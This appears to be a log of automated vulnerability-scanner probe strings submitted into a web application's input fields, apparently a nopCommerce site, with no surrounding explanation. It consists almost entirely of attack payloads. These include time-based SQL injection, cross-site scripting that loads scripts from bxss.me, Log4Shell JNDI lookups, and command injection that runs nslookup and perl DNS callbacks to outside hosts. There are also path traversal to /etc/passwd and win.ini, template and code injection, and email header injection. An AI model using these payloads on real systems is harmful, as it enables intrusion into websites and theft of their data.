(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555"&&sleep(27*1000)*mkouxc&&"
555
<!--
555
555
555
555'||sleep(27*1000)*kcaqiw||'
555
555
555
555
555
555
555"||sleep(27*1000)*rifkbv||"
'"()&%<zzz><ScRiPt >QVPX(9920)</ScRiPt>
555
555
-1; waitfor delay '0:0:15' --
555<WLPART>9WZNK[!+!]</WLPART>
555
555
555
555
555
-1); waitfor delay '0:0:15' --
555<script>5mEB(9825)</script>
5559791453
555
-1)); waitfor delay '0:0:15' --
555<ScR<ScRiPt>IpT>5mEB(9851)</sCr<ScRiPt>IpT>
555
1 waitfor delay '0:0:15' --
bfg5877<s1﹥s2ʺs3ʹhjl5877
555
555<ScRiPt
>5mEB(9640)</ScRiPt>
555
dFWbmSik'; waitfor delay '0:0:15' --
bfgx9077%C0%BEz1%C0%BCz2a%90bcxhjl9077
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9206></ScRiPt>
7uy5NjsY'); waitfor delay '0:0:15' --
<%={{={@{#{${dfb}}%>
555<isindex type=image src=1 onerror=5mEB(9748)>
555
<th:t="${dfb}#foreach
555
ml9uOeX1')); waitfor delay '0:0:15' --
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9750'>
555
555<body onload=5mEB(9946)>
-5 OR 419=(SELECT 419 FROM PG_SLEEP(15))--
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555<img src=//xss.bxss.me/t/dot.gif onload=5mEB(9165)>
-5) OR 427=(SELECT 427 FROM PG_SLEEP(15))--
555
555<img src=xyz OnErRor=5mEB(9731)>
555
-1)) OR 154=(SELECT 154 FROM PG_SLEEP(15))--
555
555
555<img/src=">" onerror=alert(9848)>
555
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%35%6D%45%42%289222%29%3C%2F%73%43%72%69%70%54%3E
dfb{{98991*97996}}xca
555
sJYiEGPW' OR 877=(SELECT 877 FROM PG_SLEEP(15))--
555
555\u003CScRiPt\5mEB(9968)\u003C/sCripT\u003E
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
VHs0du4s') OR 22=(SELECT 22 FROM PG_SLEEP(15))--
555<ScRiPt>5mEB(9578)</sCripT>
s4aIDNCf')) OR 527=(SELECT 527 FROM PG_SLEEP(15))--
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
%F6<img zzz onmouseover=5mEB(99831) //%F6>
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555<ScRiPt >QVPX(9121)</ScRiPt>
555<input autofocus onfocus=5mEB(9908)>
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555<WVSPMX>GMEMV[!+!]</WVSPMX>
<a HrEF=http://xss.bxss.me></a>
1'"
<a HrEF=jaVaScRiPT:>
555<script>QVPX(9472)</script>
@@yQwRB
555
555}body{zzz:Expre/**/SSion(5mEB(9219))}
555<ScR<ScRiPt>IpT>QVPX(9492)</sCr<ScRiPt>IpT>
555
555wSgzP
<ScRiPt >5mEB(9511)</ScRiPt>
555
555
555
555<ScRiPt
>QVPX(9747)</ScRiPt>
555
555<WJKZAF>ZGU8A[!+!]</WJKZAF>
555
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9589></ScRiPt>
555<ifRAme sRc=9749.com></IfRamE>
555<azQjWcN x=9046>
555
555<isindex type=image src=1 onerror=QVPX(9279)>
555<img sRc='http://attacker-9479/log.php?
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9993'>
555<aDxKfOm<
555
555<body onload=QVPX(9286)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=QVPX(9096)>
555
555
555<img src=xyz OnErRor=QVPX(9728)>
555
555
555<img/src=">" onerror=alert(9429)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%51%56%50%58%289730%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\QVPX(9781)\u003C/sCripT\u003E
555
555<ScRiPt>QVPX(9220)</sCripT>
555
555
%F6<img zzz onmouseover=QVPX(91181) //%F6>
555
555<input autofocus onfocus=QVPX(9233)>
<a HrEF=http://xss.bxss.me></a>
555
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(QVPX(9716))}
555
555e8dY9
<ScRiPt >QVPX(9981)</ScRiPt>
555
555<WROSSQ>KJFGA[!+!]</WROSSQ>
555
555
555<ifRAme sRc=9804.com></IfRamE>
555
555
555<aT5EMzH x=9936>
555
555<img sRc='http://attacker-9926/log.php?
555
555<aZgaA7A<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >2kdV(9293)</ScRiPt>
'"()&%<zzz><ScRiPt >2kdV(9285)</ScRiPt>
555
5559063439
555
bfg2643<s1﹥s2ʺs3ʹhjl2643
555
bfgx7449%C0%BEz1%C0%BCz2a%90bcxhjl7449
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >2kdV(9050)</ScRiPt>
555
555<WEI2ZO>IL8KM[!+!]</WEI2ZO>
555
555<script>2kdV(9946)</script>
555
555
555<ScR<ScRiPt>IpT>2kdV(9106)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>2kdV(9168)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9884></ScRiPt>
555
555<isindex type=image src=1 onerror=2kdV(9893)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9804'>
555
555
555<body onload=2kdV(9374)>
555<img src=//xss.bxss.me/t/dot.gif onload=2kdV(9465)>
555
555<img src=xyz OnErRor=2kdV(9964)>
555
555<img/src=">" onerror=alert(9278)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%32%6B%64%56%289031%29%3C%2F%73%43%72%69%70%54%3E
555
555
555\u003CScRiPt\2kdV(9943)\u003C/sCripT\u003E
555
555<ScRiPt>2kdV(9716)</sCripT>
555
%F6<img zzz onmouseover=2kdV(92481) //%F6>
555<input autofocus onfocus=2kdV(9153)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555
555}body{zzz:Expre/**/SSion(2kdV(9368))}
555XpZ0t
<ScRiPt >2kdV(9506)</ScRiPt>
555
555<W02BHJ>8PQQM[!+!]</W02BHJ>
555
555<ifRAme sRc=9513.com></IfRamE>
555
555<aEogC2H x=9265>
555
555<img sRc='http://attacker-9578/log.php?
555
555<av8a43V<
555
555
555
555
555'"()&%<zzz><ScRiPt >kOMN(9315)</ScRiPt>
555
'"()&%<zzz><ScRiPt >kOMN(9368)</ScRiPt>
5559458226
555
bfg6462<s1﹥s2ʺs3ʹhjl6462
555
555
bfgx10540%C0%BEz1%C0%BCz2a%90bcxhjl10540
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >kOMN(9880)</ScRiPt>
555
555<WX2BAF>D9CUL[!+!]</WX2BAF>
555
555<script>kOMN(9958)</script>
555
555<ScR<ScRiPt>IpT>kOMN(9991)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>kOMN(9226)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9909></ScRiPt>
555
555<isindex type=image src=1 onerror=kOMN(9043)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9168'>
555
555<body onload=kOMN(9450)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=kOMN(9489)>
555
555
555<img src=xyz OnErRor=kOMN(9568)>
555
555<img/src=">" onerror=alert(9605)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%6B%4F%4D%4E%289927%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\kOMN(9214)\u003C/sCripT\u003E
555
555<ScRiPt>kOMN(9834)</sCripT>
555
%F6<img zzz onmouseover=kOMN(99431) //%F6>
555
555<input autofocus onfocus=kOMN(9637)>
555
<a HrEF=http://xss.bxss.me></a>
555
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(kOMN(9304))}
555
555tZXz3
<ScRiPt >kOMN(9178)</ScRiPt>
555
555<WJYDP4>JO5AD[!+!]</WJYDP4>
555<ifRAme sRc=9933.com></IfRamE>
555
555<ajb5Lxs x=9567>
555
555<img sRc='http://attacker-9925/log.php?
555<aQH3s0q<
555'"()&%<zzz><ScRiPt >86Sf(9815)</ScRiPt>
555
'"()&%<zzz><ScRiPt >86Sf(9082)</ScRiPt>
555
5559649774
555
bfg9431<s1﹥s2ʺs3ʹhjl9431
555
bfgx1988%C0%BEz1%C0%BCz2a%90bcxhjl1988
555
<%={{={@{#{${dfb}}%>
${j${::-n}di:dns${::-:}${::-/}/hitbahxzlargnb11db${::-.}bxss.me}zzzz
555
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitowqbettchnc33fb${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-63843.1141.0d77d${::-.}1${::-.}bxss.me}}
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
-1 OR 2+927-927-1=0+0+0+1 --
-1 OR 3+927-927-1=0+0+0+1 --
-1 OR 2+896-896-1=0+0+0+1
-1 OR 3+896-896-1=0+0+0+1
-1' OR 2+671-671-1=0+0+0+1 --
555
dfb[[${98991*97996}]]xca
-1' OR 3+671-671-1=0+0+0+1 --
-1' OR 2+562-562-1=0+0+0+1 or '3RYqnYUx'='
-1' OR 3+562-562-1=0+0+0+1 or '3RYqnYUx'='
-1" OR 2+789-789-1=0+0+0+1 --
-1" OR 3+789-789-1=0+0+0+1 --
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
response.write(9678615*9755441)
555
'+response.write(9678615*9755441)+'
"+response.write(9678615*9755441)+"
555<ScRiPt >86Sf(9741)</ScRiPt>
555
'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-63847&h=1141-0d77d-2&"></script>
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555<WYAYJP>KCNGK[!+!]</WYAYJP>
555
echo ryhaqm$()\ zulldi\nz^xyu||a #' &echo ryhaqm$()\ zulldi\nz^xyu||a #|" &echo ryhaqm$()\ zulldi\nz^xyu||a #
FSQ4Iqn5
&echo inniab$()\ vnkcid\nz^xyu||a #' &echo inniab$()\ vnkcid\nz^xyu||a #|" &echo inniab$()\ vnkcid\nz^xyu||a #
|echo sqtzrr$()\ ombmny\nz^xyu||a #' |echo sqtzrr$()\ ombmny\nz^xyu||a #|" |echo sqtzrr$()\ ombmny\nz^xyu||a #
555<script>86Sf(9737)</script>
(nslookup hitarxilfkcxmd2200.bxss.me||perl -e "gethostbyname('hitarxilfkcxmd2200.bxss.me')")
555
if(now()=sysdate(),sleep(15),0)
$(nslookup hitxvkfwdntur8888a.bxss.me||perl -e "gethostbyname('hitxvkfwdntur8888a.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
&(nslookup hitstdtnunvoya71cc.bxss.me||perl -e "gethostbyname('hitstdtnunvoya71cc.bxss.me')")&'\"`0&(nslookup hitstdtnunvoya71cc.bxss.me||perl -e "gethostbyname('hitstdtnunvoya71cc.bxss.me')")&`'
../../../../../../../../../../../../../../windows/win.ini
bcc:074625.1141-63852.1141.0d77d.19250.2@bxss.me
555<ScR<ScRiPt>IpT>86Sf(9950)</sCr<ScRiPt>IpT>
file:///etc/passwd
to@example.com>
bcc:074625.1141-63853.1141.0d77d.19250.2@bxss.me
|(nslookup hitdjkouhdzuo624b7.bxss.me||perl -e "gethostbyname('hitdjkouhdzuo624b7.bxss.me')")
555
`(nslookup hitjtqpwtzbcz5df28.bxss.me||perl -e "gethostbyname('hitjtqpwtzbcz5df28.bxss.me')")`
;(nslookup hitmvxfglqwlm4d14e.bxss.me||perl -e "gethostbyname('hitmvxfglqwlm4d14e.bxss.me')")|(nslookup hitmvxfglqwlm4d14e.bxss.me||perl -e "gethostbyname('hitmvxfglqwlm4d14e.bxss.me')")&(nslookup hitmvxfglqwlm4d14e.bxss.me||perl -e "gethostbyname('hitmvxfglqwlm4d14e.bxss.me')")
../
./
555<ScRiPt
>86Sf(9642)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9013></ScRiPt>
555
<esi:include src="http://bxss.me/rpb.png"/>
${9999915+9999739}
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555<isindex type=image src=1 onerror=86Sf(9709)>
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9271'>
http://bxss.me/t/fit.txt?.jpg
/etc/shells
c:/windows/win.ini
555
bxss.me
555<body onload=86Sf(9971)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=86Sf(9686)>
555
555<img src=xyz OnErRor=86Sf(9296)>
&n998410=v971551
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555<img/src=">" onerror=alert(9850)>
555
)
!(()&&!|*|*|
^(#$!@#$)(()))******
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%38%36%53%66%289185%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\86Sf(9526)\u003C/sCripT\u003E
555
555<ScRiPt>86Sf(9026)</sCripT>
555
%F6<img zzz onmouseover=86Sf(94661) //%F6>
'.gethostbyname(lc('hitic'.'kmlijoalc7d11.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(86).chr(103).chr(72).'
'"()
555
".gethostbyname(lc("hitjq"."pyvuuwzx71ff2.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(74).chr(109).chr(79)."
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555<input autofocus onfocus=86Sf(9680)>
'&&sleep(27*1000)*anccof&&'
555
"&&sleep(27*1000)*pmwnka&&"
'||sleep(27*1000)*fogbjn||'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
"||sleep(27*1000)*ffrjjq||"
';print(md5(31337));$a='
<a HrEF=http://xss.bxss.me></a>
";print(md5(31337));$a="
555
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(86Sf(9042))}
555
ctime
sleep
p0
(I30
tp1
Rp2
.
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitckgarjiadff901d.'+'bxss.me')
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitckgarjiadff901d."+"bxss.me")+'
5552oYAY
<ScRiPt >86Sf(9984)</ScRiPt>
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitckgarjiadff901d.'+'bxss.me')+"
555
-1; waitfor delay '0:0:15' --
555<W3YD8H>6YUAR[!+!]</W3YD8H>
555
555<ifRAme sRc=9754.com></IfRamE>
555
555<ahURrji x=9529>
555
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555<img sRc='http://attacker-9737/log.php?
555
"+"A".concat(70-3).concat(22*4).concat(112).concat(66).concat(99).concat(65)+(require"socket"
Socket.gethostbyname("hitaj"+"errwccyc45995.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(112).concat(76).concat(97).concat(77)+(require'socket'
Socket.gethostbyname('hitcw'+'atwkpiaqa568d.bxss.me.')[3].to_s)+'
555<acj4SXr<
555
about-nopcommerce
-1); waitfor delay '0:0:15' --
about-nopcommerce/.
http://hiteyssuwnqsj.bxss.me/
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
/xfs.bxss.me
'"
<!--
'"()&%<zzz><ScRiPt >aaEU(9717)</ScRiPt>
'"()&%<zzz><ScRiPt >aaEU(9824)</ScRiPt>
9454734
bfg7793<s1﹥s2ʺs3ʹhjl7793
bfgx3307%C0%BEz1%C0%BCz2a%90bcxhjl3307
-1)); waitfor delay '0:0:15' --
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
<ScRiPt >aaEU(9150)</ScRiPt>
1 waitfor delay '0:0:15' --
<WVSEYZ>ZBH0A[!+!]</WVSEYZ>
<script>aaEU(9634)</script>
<ScR<ScRiPt>IpT>aaEU(9373)</sCr<ScRiPt>IpT>
<ScRiPt
>aaEU(9291)</ScRiPt>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9299></ScRiPt>
<isindex type=image src=1 onerror=aaEU(9531)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9919'>
<body onload=aaEU(9375)>
hBJUq8Dv'; waitfor delay '0:0:15' --
<img src=//xss.bxss.me/t/dot.gif onload=aaEU(9848)>
<img src=xyz OnErRor=aaEU(9872)>
<img/src=">" onerror=alert(9059)>
%0D%0A%3C%53%63%52%69%50%74%20%3E%61%61%45%55%289032%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\aaEU(9174)\u003C/sCripT\u003E
<ScRiPt>aaEU(9518)</sCripT>
%F6<img zzz onmouseover=aaEU(92201) //%F6>
<input autofocus onfocus=aaEU(9805)>
xoWYcZvL'); waitfor delay '0:0:15' --
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(aaEU(9762))}
PaBgV
<ScRiPt >aaEU(9708)</ScRiPt>
<WUQKAK>BJ77E[!+!]</WUQKAK>
<ifRAme sRc=9087.com></IfRamE>
<alvHM0S x=9922>
<img sRc='http://attacker-9811/log.php?
HaMOqOLi')); waitfor delay '0:0:15' --
<a6vw3fU<
-5 OR 803=(SELECT 803 FROM PG_SLEEP(15))--
-5) OR 387=(SELECT 387 FROM PG_SLEEP(15))--
-1)) OR 729=(SELECT 729 FROM PG_SLEEP(15))--
4J0rGNPg' OR 475=(SELECT 475 FROM PG_SLEEP(15))--
KznKpYL6') OR 379=(SELECT 379 FROM PG_SLEEP(15))--
7RC4x9ty')) OR 730=(SELECT 730 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@yD8Qi


555'"()&%<zzz><ScRiPt >omNg(9204)</ScRiPt>
555
${j${::-n}di:dns${::-:}${::-/}/hitpnswbgpogv230af${::-.}bxss.me}zzzz
response.write(9926493*9253920)

'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-67638&h=1141-0d77d-2&"></script>




'+response.write(9926493*9253920)+'


/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
"+response.write(9926493*9253920)+"
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitnmtljyyjdyc5a95${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
echo trispn$()\ lopvpz\nz^xyu||a #' &echo trispn$()\ lopvpz\nz^xyu||a #|" &echo trispn$()\ lopvpz\nz^xyu||a #
'"()&%<zzz><ScRiPt >omNg(9798)</ScRiPt>






&echo ehrlvs$()\ vkmevb\nz^xyu||a #' &echo ehrlvs$()\ vkmevb\nz^xyu||a #|" &echo ehrlvs$()\ vkmevb\nz^xyu||a #
xxOkCbGI


${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-67642.1141.0d77d${::-.}1${::-.}bxss.me}}


|echo xqqpxr$()\ rqiemb\nz^xyu||a #' |echo xqqpxr$()\ rqiemb\nz^xyu||a #|" |echo xqqpxr$()\ rqiemb\nz^xyu||a #






555
(nslookup hitovcxabwywj15919.bxss.me||perl -e "gethostbyname('hitovcxabwywj15919.bxss.me')")


5559616061
../../../../../../../../../../../../../../etc/passwd
$(nslookup hitnynlkqjbct9f9a6.bxss.me||perl -e "gethostbyname('hitnynlkqjbct9f9a6.bxss.me')")
../../../../../../../../../../../../../../windows/win.ini


file:///etc/passwd
&(nslookup hitdgtrvzgadma7ef7.bxss.me||perl -e "gethostbyname('hitdgtrvzgadma7ef7.bxss.me')")&'\"`0&(nslookup hitdgtrvzgadma7ef7.bxss.me||perl -e "gethostbyname('hitdgtrvzgadma7ef7.bxss.me')")&`'

<esi:include src="http://bxss.me/rpb.png"/>






../


|(nslookup hitwpcglyakut23483.bxss.me||perl -e "gethostbyname('hitwpcglyakut23483.bxss.me')")
${10000351+10000012}
to@example.com>
bcc:074625.1141-67647.1141.0d77d.19250.2@bxss.me














http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

&n968116=v933531
`(nslookup hitpfytzeywyz44882.bxss.me||perl -e "gethostbyname('hitpfytzeywyz44882.bxss.me')")`




Http://bxss.me/t/fit.txt
;(nslookup hitxxgudqbsxge1306.bxss.me||perl -e "gethostbyname('hitxxgudqbsxge1306.bxss.me')")|(nslookup hitxxgudqbsxge1306.bxss.me||perl -e "gethostbyname('hitxxgudqbsxge1306.bxss.me')")&(nslookup hitxxgudqbsxge1306.bxss.me||perl -e "gethostbyname('hitxxgudqbsxge1306.bxss.me')")


http://bxss.me/t/fit.txt?.jpg




/etc/shells


)


c:/windows/win.ini
!(()&&!|*|*|


bxss.me
^(#$!@#$)(()))******


'.gethostbyname(lc('hitzx'.'tnnxhlgz269e3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(83).chr(114).chr(84).'












".gethostbyname(lc("hiteg"."leyjrxun86a78.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(66).chr(108).chr(68)."














'"()
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));




';print(md5(31337));$a='




";print(md5(31337));$a="
${@print(md5(31337))}


${@print(md5(31337))}\
ctime
sleep
p0
(I30
tp1
Rp2
.
'.print(md5(31337)).'
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitaufssdtgpu1186b.'+'bxss.me')

'&&sleep(27*1000)*hwxxsn&&'


'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitaufssdtgpu1186b."+"bxss.me")+'



"&&sleep(27*1000)*khpeso&&"


"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitaufssdtgpu1186b.'+'bxss.me')+"

'||sleep(27*1000)*hhzqdu||'





"||sleep(27*1000)*ursvgy||"






HttP://bxss.me/t/xss.html?%00


bxss.me/t/xss.html?%00














-1 OR 2+690-690-1=0+0+0+1 --
-1 OR 2+319-319-1=0+0+0+1
-1' OR 2+951-951-1=0+0+0+1 --
"+"A".concat(70-3).concat(22*4).concat(97).concat(80).concat(97).concat(69)+(require"socket"
Socket.gethostbyname("hitqt"+"osyfvihi9b44d.bxss.me.")[3].to_s)+"
-1' OR 2+661-661-1=0+0+0+1 or 'ZwSN6dCr'='
about-nopcommerce
-1" OR 2+551-551-1=0+0+0+1 --


'+'A'.concat(70-3).concat(22*4).concat(108).concat(80).concat(101).concat(68)+(require'socket'
Socket.gethostbyname('hitqk'+'tmxhatak1226d.bxss.me.')[3].to_s)+'
about-nopcommerce/.
http://hitamslfxwgtt.bxss.me/
















)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))




/xfs.bxss.me
'"


<!--





'"()&%<zzz><ScRiPt >OYip(9583)</ScRiPt>
'"()&%<zzz><ScRiPt >OYip(9027)</ScRiPt>




if(now()=sysdate(),sleep(15),0)

9438968
bfg1303<s1﹥s2ʺs3ʹhjl1303






bfgx9597%C0%BEz1%C0%BCz2a%90bcxhjl9597


<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

<ScRiPt >OYip(9071)</ScRiPt>

<WVEOOX>L0XUO[!+!]</WVEOOX>

<ScRiPt
>OYip(9318)</ScRiPt>

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9470></ScRiPt>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

<isindex type=image src=1 onerror=OYip(9550)>

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9351'>

<body onload=OYip(9943)>

<img src=//xss.bxss.me/t/dot.gif onload=OYip(9820)>

<img src=xyz OnErRor=OYip(9073)>
1 waitfor delay '0:0:15' --

<img/src=">" onerror=alert(9608)>
%0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%4F%59%69%70%289509%29%3C%2F%73%43%72%69%70%54%3E

<ScRiPt>OYip(9500)</sCripT>
%F6<img zzz onmouseover=OYip(94051) //%F6>
rCI4Sx8c'; waitfor delay '0:0:15' --

<input autofocus onfocus=OYip(9561)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>

}body{zzz:Expre/**/SSion(OYip(9870))}

eEg64
<ScRiPt >OYip(9250)</ScRiPt>
GFTsKuQn'); waitfor delay '0:0:15' --

<WHDPGX>YBIAW[!+!]</WHDPGX>

<ifRAme sRc=9172.com></IfRamE>

<aCViOQx x=9216>

<img sRc='http://attacker-9257/log.php?

<a66C3PL<


PQnzx4bY')); waitfor delay '0:0:15' --












7yWpl9uw' OR 470=(SELECT 470 FROM PG_SLEEP(15))--












kBOW1uzs') OR 500=(SELECT 500 FROM PG_SLEEP(15))--












GlBrOnRL')) OR 515=(SELECT 515 FROM PG_SLEEP(15))--

















'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@qIsUt














































































555'"()&%<zzz><ScRiPt >LBa2(9792)</ScRiPt>
555
'"()&%<zzz><ScRiPt >LBa2(9337)</ScRiPt>
555
5559098742
555
bfg4106<s1﹥s2ʺs3ʹhjl4106
555
bfgx5901%C0%BEz1%C0%BCz2a%90bcxhjl5901
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >LBa2(9517)</ScRiPt>
555
555<WYASTI>V62X0[!+!]</WYASTI>
555
555<script>LBa2(9715)</script>
555<ScR<ScRiPt>IpT>LBa2(9417)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>LBa2(9222)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9495></ScRiPt>
555
555<isindex type=image src=1 onerror=LBa2(9690)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9444'>
555
555<body onload=LBa2(9045)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=LBa2(9439)>
555
555<img src=xyz OnErRor=LBa2(9386)>
555
555<img/src=">" onerror=alert(9622)>
555
